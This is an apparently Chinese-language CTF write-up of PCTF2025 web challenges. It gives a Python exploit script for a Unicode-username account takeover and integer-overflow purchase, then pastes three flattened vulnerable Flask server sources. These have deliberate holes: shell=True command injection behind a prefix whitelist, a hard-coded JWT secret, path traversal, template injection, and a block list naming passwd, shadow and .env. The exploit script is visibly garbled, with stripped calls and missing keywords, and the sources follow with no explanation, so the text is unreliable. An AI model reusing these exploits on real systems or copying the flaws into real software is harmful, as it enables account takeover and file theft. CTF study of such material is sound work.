PCTF2025 Web 安全挑战解题报告（下）

神秘商店

打开题目只有一个登录框。

文章配图

尝试登录 admin，发现可以利用全角字符注册登录。后端代码存在转换逻辑，全角字符能够绕过后端对 admin 的检测，将全角 admin 识别为正常 admin，造成覆盖注册并修改密码。

文章配图

利用整数溢出（从 4294967246 到 50），购买 flag。可以直接编写脚本自动化攻击。

import requests

def exploit():
    url = "http://challenge2.pctf.top:32735"
    session = requests.Session()
    print("[+] 注册管理员账户...")
    users = {
        "username": "admi\u00efn",
        "password": "123456"
    }
    response = session.post(f"{url}/register", data=users)
    print(f"[+] 注册响应：{response.status_code}")
    print("[+] 登录...")
    users = {
        "username": "admi\u00efn",
        "password": "123456"
    }
    response = session.post(f"{url}/login", data=users)
    print(f"[+] 登录响应：{response.status_code}")
    response = session.get(f"{url}/user")
    print(f"[+] 用户信息:{response.text}")
    ()
    amount = {: }
    response = session.post(, data=amount)
    ()
    ()
    product = {: }
    response = session.post(, json=product)
    ()

 __name__ == :
    exploit()

from flask import Flask, redirect, url_for, render_template, request import jwt import uuid import os import subprocess from werkzeug.security import generate_password_hash, check_password_hash app = Flask(__name__) app.config['SECRET_KEY'] = str(uuid.uuid4()) accounts = {} def create_token(user_id, username): payload = { 'user_id': user_id, 'username': username } token = jwt.encode(payload, app.config['SECRET_KEY'], algorithm='HS256') if isinstance(token, bytes): token = token.decode('utf-8') return token def verify_token(token): try: payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256']) user_id = payload['user_id'] username = payload['username'] return user_id, username except: return None def login_required(f): from functools import wraps @wraps(f) def decorated(*args, **kwargs): token = request.cookies.get('token') if not token: return redirect(url_for('login')) res = verify_token(token) if not res: return redirect(url_for('login')) user_id, username = res return f(user_id, username, *args, **kwargs) return decorated def check_login(u, p): for user_id, info in accounts.items(): if info['username'] == u: return check_password_hash(info['password'], p), user_id return False, None @app.route('/') def index(): return redirect(url_for('login')) @app.route('/login', methods=['GET', 'POST']) def login(): error_msg = None if request.method == 'POST': username = request.form['username'] password = request.form['password'] ok, user_id = check_login(username, password) if ok: token = create_token(user_id, username) response = redirect(url_for('dashboard')) response.set_cookie('token', token, httponly=True) return response else: error_msg = "Username or Password incorrect!" return render_template('login.html', error_msg=error_msg) @app.route('/logout') def logout(): response = redirect(url_for('login')) response.delete_cookie('token') return response @app.route('/dashboard') @login_required def dashboard(user_id, username): return render_template('dashboard.html', user_id=user_id, username=username) SAFE_COMMANDS = ['ls', 'pwd', 'whoami', 'dir', 'more'] @app.route('/dashboard/run', methods=['POST']) @login_required def run_command(user_id, username): user_id, username = verify_token(request.cookies.get('token')) cmd = request.form.get('command', '').strip() if not cmd or cmd.split()[0] not in SAFE_COMMANDS: return render_template('dashboard.html', user_id=user_id, username=username, error_msg="Error: Command not allowed or empty") try: result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=5) output = result.stdout + result.stderr return render_template('dashboard.html', user_id=user_id, username=username, output=output, command=cmd) except Exception as e: return render_template('dashboard.html', username=username, error_msg=f"Error: {str(e)}") if __name__ == '__main__': admin_id = 0 admin_username = 'admin123' admin_password = str(uuid.uuid4()) # password overlay for path for path in ['/password', './password.txt']: try: if os.path.exists(path) and os.path.isfile(path): with open(path, 'rb') as f: raw = f.read() if not raw: continue text = raw.decode('utf-8', errors='replace').strip() candidates = [line.strip() for line in text.splitlines() if line.strip()] if candidates: import secrets admin_password = secrets.choice(candidates) break except: pass print(f' * Admin password: {admin_password}') accounts[admin_id] = { 'username': admin_username, 'password': generate_password_hash(admin_password) } app.run(debug=False, host='0.0.0.0')

from flask import Flask, request, redirect, url_for, render_template import jwt import uuid import os from werkzeug.security import generate_password_hash, check_password_hash app = Flask(__name__) app.config['SECRET_KEY'] = '0f3cbb44-f199-4d34-ade9-1545c0972648' accounts_usernames = [] accounts = {} user_passwords = {} def check_username(new_username): if new_username in accounts_usernames: return True return False def check_login(username, password): if username not in accounts: return False return check_password_hash(accounts[username], password) def insert_account(new_username, new_password_hash): try: accounts_usernames.append(new_username) accounts[new_username] = new_password_hash user_passwords[new_username] = [] return True except: return False def create_token(username): payload = {'username': username,} token = jwt.encode(payload, app.config['SECRET_KEY'], algorithm='HS256') if isinstance(token, bytes): token = token.decode('utf-8') return token def verify_token(token): try: payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256']) return payload['username'] except: return None def login_required(f): def decorated(*args, **kwargs): token = request.cookies.get('token') if not token or not verify_token(token): return redirect(url_for('login')) return f(*args, **kwargs) decorated.__name__ = f.__name__ return decorated def add_password_item(username, website, site_username, password, notes=''): try: password_item = { 'id': str(uuid.uuid4()), 'website': website, 'username': site_username, 'password': password, 'notes': notes, } user_passwords[username].append(password_item) return True except: return False def delete_password_item(username, item_id): try: user_passwords[username] = [item for item in user_passwords[username] if item['id'] != item_id] return True except: return False def get_user_passwords(username): return user_passwords.get(username, []) @app.route('/') def index(): return redirect(url_for('login')) @app.route('/register', methods=['GET', 'POST']) def register(): if request.method == 'POST': username = request.form['username'] password = request.form['password'] user_exists = check_username(username) if user_exists: return render_template('register.html', error_msg="User Already Existed!") password_hash = generate_password_hash(password) insert_account(username, password_hash) return redirect(url_for('login')) return render_template('register.html') @app.route('/login', methods=['GET', 'POST']) def login(): if request.method == 'POST': username = request.form['username'] password = request.form['password'] user_exists = check_username(username) if user_exists == False: return render_template('login.html', error_msg='Username or Password Wrong!') if check_login(username, password): token = create_token(username) response = redirect(url_for('dashboard')) response.set_cookie('token', token, httponly=True) return response else: return render_template('login.html', error_msg='Username or Password Wrong!') return render_template('login.html') @app.route('/logout') def logout(): response = redirect(url_for('login')) response.delete_cookie('token') return response @app.route('/dashboard') @login_required def dashboard(): username = verify_token(request.cookies.get('token')) passwords = get_user_passwords(username) return render_template('dashboard.html', username=username, passwords=passwords) @app.route('/add_password', methods=['POST']) @login_required def add_password(): username = verify_token(request.cookies.get('token')) website = request.form['website'] site_username = request.form['site_username'] password = request.form['password'] notes = request.form.get('notes', '') if add_password_item(username, website, site_username, password, notes): return redirect(url_for('dashboard')) else: return render_template('dashboard.html', username=username, passwords=get_user_passwords(username), error_msg="Add password error") @app.route('/delete_password/<item_id>') @login_required def delete_password(item_id): username = verify_token(request.cookies.get('token')) if delete_password_item(username, item_id): return redirect(url_for('dashboard')) else: return render_template('dashboard.html', username=username, passwords=get_user_passwords(username), error_msg="Delete password error") if __name__ == '__main__': admin_password = str(uuid.uuid4()) insert_account('admin', generate_password_hash(admin_password)) for path in ['/flag', './flag.txt']: try: if os.path.exists(path) and os.path.isfile(path): with open(path, 'rb') as f: raw = f.read() if raw: content = raw.decode('utf-8', errors='replace').strip() add_password_item('admin', website='seeded-flag', site_username='flag-file', password=content, notes=f'seeded from {path}') break except: pass app.run(debug=False, host='0.0.0.0')

import os import uuid from flask import Flask, request, render_template_string, redirect, url_for, send_from_directory, flash, jsonify from werkzeug.exceptions import RequestEntityTooLarge app = Flask(__name__) app.secret_key = 'your_secret_key_here' UPLOAD_FOLDER = 'uploads' MAX_FILE_SIZE = 16 * 1024 * 1024 ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif', 'doc', 'docx', 'zip', 'html'} BLACKLIST_KEYWORDS = [ 'env', '.env', 'environment', 'profile', 'bashrc', 'proc', 'sys', 'etc', 'passwd', 'shadow', 'flag' ] app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER app.config['MAX_CONTENT_LENGTH'] = MAX_FILE_SIZE if not os.path.exists(UPLOAD_FOLDER): os.makedirs(UPLOAD_FOLDER) def allowed_file(filename): return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS @app.route('/') def index(): try: with open('templates/index.html', 'r', encoding='utf-8') as f: template_content = f.read() return render_template_string(template_content) except FileNotFoundError: try: with open('templates/error_template_not_found.html', 'r', encoding='utf-8') as f: return f.read() except: return '<h1>错误</h1><p>模板文件未找到</p><a href="/upload">上传文件</a>' except Exception as e: try: with open('templates/error_render.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, error_message=str(e)) except: return '<h1>渲染错误</h1><p>' + str(e) + '</p><a href="/upload">上传文件</a>' @app.route('/upload', methods=['GET', 'POST']) def upload_file(): if request.method == 'POST': if 'file' not in request.files: flash('没有选择文件') return redirect(request.url) file = request.files['file'] if file.filename == '': flash('没有选择文件') return redirect(request.url) if file and allowed_file(file.filename): filename = file.filename filename = filename.replace('../', '') file_path = os.path.join(UPLOAD_FOLDER, filename) try: file.save(file_path) flash('文件 {} 上传成功！'.format(filename)) return redirect('/upload') except Exception as e: flash('文件上传失败：{}'.format(str(e))) return redirect(request.url) else: flash('不允许的文件类型') return redirect(request.url) try: with open('templates/upload.html', 'r', encoding='utf-8') as f: template_content = f.read() return render_template_string(template_content) except FileNotFoundError: try: with open('templates/error_upload_not_found.html', 'r', encoding='utf-8') as f: return f.read() except: return '<h1>错误</h1><p>上传页面模板未找到</p><a href="/">返回主页</a>' @app.route('/file') def view_file(): file_path = request.args.get('file', '') if not file_path: try: with open('templates/file_no_param.html', 'r', encoding='utf-8') as f: return f.read() except: return '<h1>文件查看</h1><p>请使用 ?file= 参数指定要查看的文件</p><a href="/">返回主页</a>' file_path_lower = file_path.lower() for keyword in BLACKLIST_KEYWORDS: if keyword in file_path_lower: try: with open('templates/file_error.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, file_path=file_path, error_message='访问被拒绝：文件路径包含敏感关键词 [{}]'.format(keyword)) except: return '<h1>访问被拒绝</h1><p>文件路径包含敏感关键词</p><a href="/">返回主页</a>' try: with open(file_path, 'r', encoding='utf-8') as f: file_content = f.read() try: with open('templates/file_view.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, file_path=file_path, file_content=file_content) except: return '<h1>文件内容</h1><pre>{}</pre><a href="/">返回主页</a>'.format(file_content) except Exception as e: try: with open('templates/file_error.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, file_path=file_path, error_message=str(e)) except: return '<h1>文件读取失败</h1><p>错误：{}<p><a href="/">返回主页</a>'.format(str(e)) @app.errorhandler(RequestEntityTooLarge) def too_large(e): try: with open('templates/error_too_large.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, max_size=MAX_FILE_SIZE // (1024*1024)), 413 except: return '<h1>文件过大</h1><p>文件大小不能超过 {} MB</p>'.format(MAX_FILE_SIZE // (1024*1024)), 413 @app.errorhandler(404) def not_found(e): try: with open('templates/error_404.html', 'r', encoding='utf-8') as f: return f.read(), 404 except: return '<h1>404</h1><p>页面不存在</p>', 404 @app.errorhandler(500) def server_error(e): try: with open('templates/error_500.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, error_message=str(e)), 500 except: return '<h1>500</h1><p>服务器内部错误：{}<p>'.format(str(e)), 500 if __name__ == '__main__': print("启动 Flask 文件上传应用...") print("上传目录：{}".format(UPLOAD_FOLDER)) print("最大文件大小：{} MB".format(MAX_FILE_SIZE // (1024*1024))) print("允许的文件类型：{}".format(ALLOWED_EXTENSIONS)) app.run(debug=False, host='0.0.0.0', port=5000)